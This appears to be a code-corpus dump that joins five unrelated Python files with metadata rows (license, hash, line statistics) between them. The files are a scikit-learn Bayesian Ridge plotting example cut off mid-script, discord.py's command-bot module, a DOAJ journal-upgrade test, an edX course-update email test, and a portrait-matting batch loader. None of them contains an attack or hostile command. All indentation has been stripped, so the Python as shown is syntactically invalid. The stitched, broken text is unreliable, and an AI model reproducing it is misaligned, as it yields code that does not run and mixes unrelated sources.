X = np.random.randn(n_samples, n_features) # Create Gaussian data
# Create weigts with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
###############################################################################
# Fit the Bayesian Ridge Regression and an OLS for comparison
clf = BayesianRidge(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot true weights, estimated weights and histogram of the weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, 'b-', label="Bayesian Ridge estimate")
plt.plot(w, 'g-', label="Ground truth")
plt.plot(ols.coef_, 'r--', label="OLS estimate")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc="best", prop=dict(size=12))
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, log=True)
plt.plot(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
'ro', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc="lower left")
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
plt.plot(clf.scores_)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
os.system("pause")
|
gpl-3.0
| 3,795,073,158,633,134,000
| 31.52381
| 79
| 0.63348
| false
| 3.359016
| false
| false
| false
|
variablehair/Eggplantato
|
discord/ext/commands/bot.py
|
1
|
26536
|
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
guild = msg.guild
if guild is not None:
return '{0.me.mention} '.format(guild)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = yield from bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from destination.send(bot.command_not_found.format(key))
return
except AttributeError:
yield from destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from destination.send(page)
class BotBase(GroupMixin):
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self._before_invoke = None
self._after_invoke = None
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
if options.pop('self_bot', False):
self._skip_check = lambda x, y: x != y
else:
self._skip_check = lambda x, y: x == y
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
coro = self._run_event(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. info::
This function can either be a regular function or a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
@asyncio.coroutine
def can_run(self, ctx):
if len(self._checks) == 0:
return True
return (yield from discord.utils.async_all(f(ctx) for f in self._checks))
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
The :meth:`before_invoke` and :meth:`after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro
The coroutine to register as the pre-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
Similar to :meth:`before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro
The coroutine to register as the post-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._after_invoke = coro
return coro
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the command to use. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`discord.on_ready`
The functions being listened to must be a coroutine.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__global_check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member, name)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[str], str]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def get_context(self, message, *, cls=Context):
"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`process_message`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls: type
The factory class that will be used to create the context.
By default, this is :class:`Context`. Should a custom
class be provided, it must be similar enough to :class:`Context`\'s
interface.
Returns
--------
:class:`Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if self._skip_check(message.author.id, self.user.id):
return ctx
prefix = yield from self.get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return ctx
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return ctx
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.commands.get(invoker)
return ctx
@asyncio.coroutine
def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
yield from ctx.command.invoke(ctx)
except CommandError as e:
yield from ctx.command.dispatch_error(e, ctx)
else:
ctx.command_failed = False
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = CommandNotFound('Command "{}" is not found'.format(ctx.invoked_with))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`get_context` followed by a call to :meth:`invoke`.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
ctx = yield from self.get_context(message)
yield from self.invoke(ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`Bot` except that it is derived from
:class:`discord.AutoShardedClient` instead.
"""
pass
|
mit
| -222,379,513,342,976,670
| 32.17
| 123
| 0.599525
| false
| 4.544614
| false
| false
| false
|
DOAJ/doaj
|
doajtest/unit/test_upgrade.py
|
1
|
2252
|
import json
import time
import re
from collections import OrderedDict
from doajtest.helpers import DoajTestCase
from portality import models
from portality.upgrade import do_upgrade
from portality.lib.paths import rel2abs
def operation(journal):
j = models.Journal.pull(journal.id)
bj = j.bibjson()
bj.title = "Updated Title"
j.save()
return j
class TestUpgrade(DoajTestCase):
def test_upgrade(self):
# populate the index with some journals with title
saved_journals = {}
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.title = "Test Journal"
bj.add_identifier(bj.P_ISSN, "{x}000-0000".format(x=i))
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# and with some journals without title
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.add_identifier(bj.P_ISSN, "{x}000-0001".format(x=i))
bj.title = "Journal to Change"
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# make sure the last updated dates will be suitably different after migration
time.sleep(1.5)
path =rel2abs(__file__, ".", "resources", "migrate.json")
with open(path) as f:
instructions = json.loads(f.read(), object_pairs_hook=OrderedDict)
do_upgrade(instructions,None)
p = re.compile('[0-4]000-0001')
for id in saved_journals:
j = models.Journal.pull(id)
bj = j.bibjson()
pissn = bj.get_one_identifier(bj.P_ISSN)
if not p.match(pissn):
assert bj.title == "Test Journal"
assert j.last_updated == saved_journals[j.id]
else:
assert bj.title == "Updated Title"
assert not j.last_updated == saved_journals[j.id]
|
apache-2.0
| 5,705,412,087,984,378,000
| 27.506329
| 85
| 0.567496
| false
| 3.48068
| true
| false
| false
|
ESOedX/edx-platform
|
openedx/core/djangoapps/schedules/management/commands/tests/test_send_course_update.py
|
1
|
4396
|
"""
Tests for send_course_update management command.
"""
from __future__ import absolute_import
from unittest import skipUnless
import ddt
from django.conf import settings
from edx_ace.utils.date import serialize
from mock import patch
from six.moves import range
from openedx.core.djangoapps.schedules import resolvers, tasks
from openedx.core.djangoapps.schedules.config import COURSE_UPDATE_WAFFLE_FLAG
from openedx.core.djangoapps.schedules.management.commands import send_course_update as nudge
from openedx.core.djangoapps.schedules.management.commands.tests.send_email_base import (
ExperienceTest,
ScheduleSendEmailTestMixin
)
from openedx.core.djangoapps.schedules.management.commands.tests.upsell_base import ScheduleUpsellTestMixin
from openedx.core.djangoapps.schedules.models import ScheduleExperience
from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag
from openedx.core.djangolib.testing.utils import skip_unless_lms
from student.tests.factories import CourseEnrollmentFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
@ddt.ddt
@skip_unless_lms
@skipUnless(
'openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed",
)
class TestSendCourseUpdate(ScheduleUpsellTestMixin, ScheduleSendEmailTestMixin, ModuleStoreTestCase):
__test__ = True
# pylint: disable=protected-access
resolver = resolvers.CourseUpdateResolver
task = tasks.ScheduleCourseUpdate
deliver_task = tasks._course_update_schedule_send
command = nudge.Command
deliver_config = 'deliver_course_update'
enqueue_config = 'enqueue_course_update'
expected_offsets = list(range(-7, -77, -7))
experience_type = ScheduleExperience.EXPERIENCES.course_updates
queries_deadline_for_each_course = True
def setUp(self):
super(TestSendCourseUpdate, self).setUp()
self.highlights_patcher = patch('openedx.core.djangoapps.schedules.resolvers.get_week_highlights')
mock_highlights = self.highlights_patcher.start()
mock_highlights.return_value = [u'Highlight {}'.format(num + 1) for num in range(3)]
self.addCleanup(self.stop_highlights_patcher)
def stop_highlights_patcher(self):
"""
Stops the patcher for the get_week_highlights method
if the patch is still in progress.
"""
if self.highlights_patcher is not None:
self.highlights_patcher.stop()
@ddt.data(
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.default, offset=expected_offsets[0], email_sent=False),
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.course_updates, offset=expected_offsets[0], email_sent=True),
ExperienceTest(experience=None, offset=expected_offsets[0], email_sent=False),
)
def test_schedule_in_different_experience(self, test_config):
self._check_if_email_sent_for_experience(test_config)
@override_waffle_flag(COURSE_UPDATE_WAFFLE_FLAG, True)
@patch('openedx.core.djangoapps.schedules.signals.get_current_site')
def test_with_course_data(self, mock_get_current_site):
self.highlights_patcher.stop()
self.highlights_patcher = None
mock_get_current_site.return_value = self.site_config.site
course = CourseFactory(highlights_enabled_for_messaging=True, self_paced=True)
with self.store.bulk_operations(course.id):
ItemFactory.create(parent=course, category='chapter', highlights=[u'highlights'])
enrollment = CourseEnrollmentFactory(course_id=course.id, user=self.user, mode=u'audit')
self.assertEqual(enrollment.schedule.get_experience_type(), ScheduleExperience.EXPERIENCES.course_updates)
_, offset, target_day, _ = self._get_dates(offset=self.expected_offsets[0])
enrollment.schedule.start = target_day
enrollment.schedule.save()
with patch.object(tasks, 'ace') as mock_ace:
self.task().apply(kwargs=dict(
site_id=self.site_config.site.id,
target_day_str=serialize(target_day),
day_offset=offset,
bin_num=self._calculate_bin_for_user(enrollment.user),
))
self.assertTrue(mock_ace.send.called)
|
agpl-3.0
| -5,302,609,191,891,175,000
| 42.96
| 126
| 0.734531
| false
| 3.835951
| true
| false
| false
|
PetroWu/AutoPortraitMatting
|
portrait.py
|
1
|
8570
|
import numpy as np
import scipy.io as sio
import os
from PIL import Image
class BatchDatset:
imgs = []
max_batch = 0
batch_size = 0
cur_imgs = []
cur_labels = []
cur_batch = 0 # index of batch generated
cur_ind = 0 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['trainlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
self.cur_imgs, self.cur_labels = self.get_variations(self.imgs[0])
def next_batch(self):
while len(self.cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_imgs, tmp_labels = self.get_variations(cur_name)
self.cur_imgs += tmp_imgs
self.cur_labels += tmp_labels
if len(self.cur_imgs) >= self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = self.cur_imgs.pop(0)
ramat[i, :, :, 0] = self.cur_labels.pop(0)
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat
return [], []
def get_variations(self, img_name):
imgs = []
labels = []
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
imgs.append(nimat)
labels.append(namat)
angs = [-45, -22, 22, 45]
gammas = [0.8, 0.9, 1.1, 1.2]
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
i_img = Image.fromarray(np.uint8(org_mat))
a_img = Image.fromarray(np.uint8(amat))
for i in range(4):
tmpi_img = i_img.rotate(angs[i])
tmpa_img = a_img.rotate(angs[i])
tmpri_img = np.array(tmpi_img, dtype=np.int)
rimat = np.zeros(tmpri_img.shape, dtype=np.float)
for k in range(h):
for j in range(w):
rimat[k][j][0] = (tmpri_img[k][j][2] * 1.0 - 104.008) / 255
rimat[k][j][1] = (tmpri_img[k][j][1] * 1.0 - 116.669) / 255
rimat[k][j][2] = (tmpri_img[k][j][0] * 1.0 - 122.675) / 255
imgs.append(rimat)
labels.append(np.array(tmpa_img, dtype=np.int))
tmp_nimat = np.array(imat, dtype=np.float)
tmp_nimat[:, :, 0] = tmp_nimat[:, :, 0] * 255 + 104.01
tmp_nimat[:, :, 0] = (pow(tmp_nimat[:, :, 0], gammas[i]) - pow(104.01, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 1] = tmp_nimat[:, :, 1] * 255 + 116.67
tmp_nimat[:, :, 1] = (pow(tmp_nimat[:, :, 1], gammas[i]) - pow(116.67, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 2] = tmp_nimat[:, :, 2] * 255 + 122.68
tmp_nimat[:, :, 2] = (pow(tmp_nimat[:, :, 2], gammas[i]) - pow(122.68, gammas[i])) / pow(255, gammas[i])
imgs.append(tmp_nimat)
labels.append(namat)
return imgs, labels
class TestDataset:
imgs = []
max_batch = 0
batch_size = 0
cur_batch = 0 # index of batch generated
cur_ind = -1 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['testlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
#self.cur_imgs, self.cur_labels = self.get_images(self.imgs[0])
def next_batch(self):
cur_imgs = []
cur_labels = []
cur_orgs = []
while len(cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_img, tmp_label, tmp_org = self.get_images(cur_name)
if tmp_img is not None:
cur_imgs.append(tmp_img)
cur_labels.append(tmp_label)
cur_orgs.append(tmp_org)
if len(cur_imgs) == self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
org_mat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.int)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = cur_imgs.pop(0)
org_mat[i] = cur_orgs.pop(0)
ramat[i, :, :, 0] = cur_labels.pop(0)
#print('getting', ramat[0, 200:210, 200:220])
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat, org_mat
return [], [], []
def get_images(self, img_name):
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
return nimat, namat, org_mat
return None, None, None
if __name__ == '__main__':
data = BatchDatset('data/trainlist.mat')
'''ri, ra = data.next_batch()
while len(ri) != 0:
ri, ra = data.next_batch()
print(np.sum(ra))'''
